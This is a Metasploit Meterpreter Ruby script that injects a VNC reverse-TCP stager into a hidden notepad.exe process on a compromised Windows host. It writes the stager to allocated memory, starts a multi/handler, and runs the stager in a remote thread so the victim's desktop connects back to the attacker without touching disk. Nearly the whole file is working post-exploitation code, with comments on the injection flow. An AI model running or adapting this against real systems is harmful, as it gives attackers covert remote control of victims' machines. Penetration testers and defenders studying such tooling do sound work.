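# $Id: vnc_mem.rb 12-17-2009 hdm $
#
# Meterpreter script for obtaining a quick VNC session
# Hybrid of vnc.rb and vnc_oneport.rb
# Utilizes memory functions so no file is created
# All code written by H.D. Moore (hdm)
# Edited by hhmatt
#
# Flow: build the windows/vncinject/reverse_tcp stager, spawn a hidden
# host process on the target, copy the raw stager bytes into memory
# allocated inside that process, start a local multi/handler, and only
# then run the stager in a new thread of the host process so it connects
# back to LHOST:LPORT. Nothing is dropped to the target's disk.
#
# Options:
#   -h  print usage and stop
#   -r  LHOST for the stager and the handler (default: the local address
#       that routes toward the Internet)
#   -p  LPORT for the stager and the handler (default: 4545)
#   -e  process to spawn on the target and inject into (default: notepad.exe)
#
session = client
#
# Options
#
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This help menu"],
  "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
  "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4545)"],
  # "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"],
  "-e" => [ true, "The process to run and inject into (default:notepad.exe)"])
#
# Default parameters
#
runme = "notepad.exe"
# Local address that would be used to reach an arbitrary remote IP; it is
# the LHOST the agent connects back to unless -r overrides it.
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4545
#autoconn = true
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
  case opt
  when "-h"
    print_line(opts.usage)
    return
  when "-r"
    rhost = val
  when "-p"
    # to_i silently turns bad input into 0, which would make both the
    # stager and the handler unusable; reject anything outside TCP range.
    rport = val.to_i
    unless (1..65535).include?(rport)
      print_error("Invalid port '#{val}': expected 1-65535")
      return
    end
  # when "-D"
  #   autoconn = false
  when "-e"
    runme = val
  end
end
#
# Create the agent stager
#
# Only the raw stager bytes are needed: they are written straight into the
# host process, so no PE wrapper is built (that was leftover from vnc.rb).
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport}")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
print_status("VNC stager is #{raw.length} bytes long")
#
# Create a host process
#
pid = client.sys.process.execute(runme, nil, {'Hidden' => true}).pid
print_status("Host process #{runme} has PID #{pid}")
note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
# Reserve at least 32 KiB, but never less than the stager itself, so a
# larger payload cannot overrun the region.
# NOTE(review): the stager is later started at this address, so allocate()
# is relied on to hand back executable memory - confirm its default
# protection for the Meterpreter version in use.
region = [1024*32, raw.length].max
mem = note.memory.allocate(region)
print_status("Allocated memory at address #{"0x%.8x" % mem}")
print_status("Writing the VNC stager into memory...")
note.memory.write(mem, raw)
#
# Setup the multi/handler
#
# The handler must be listening before the stager thread is started,
# otherwise the connect-back is refused and the agent dies.
mul = client.framework.exploits.create("multi/handler")
mul.datastore['PAYLOAD'] = "windows/vncinject/reverse_tcp"
mul.datastore['LHOST'] = rhost
mul.datastore['LPORT'] = rport
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.datastore['DisableCourtesyShell'] = true
mul.exploit_simple(
  'Payload' => mul.datastore['PAYLOAD'],
  'RunAsJob' => true)
#
# Execute the agent
#
# Running the stager as a thread of the host process is the whole delivery;
# the former trailing execute() of an undefined 'tempexe' was dead code
# from vnc.rb and would have raised NameError after the thread started.
print_status("Creating a new thread within #{runme} to run the VNC stager...")
note.thread.create(mem, 0)
print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")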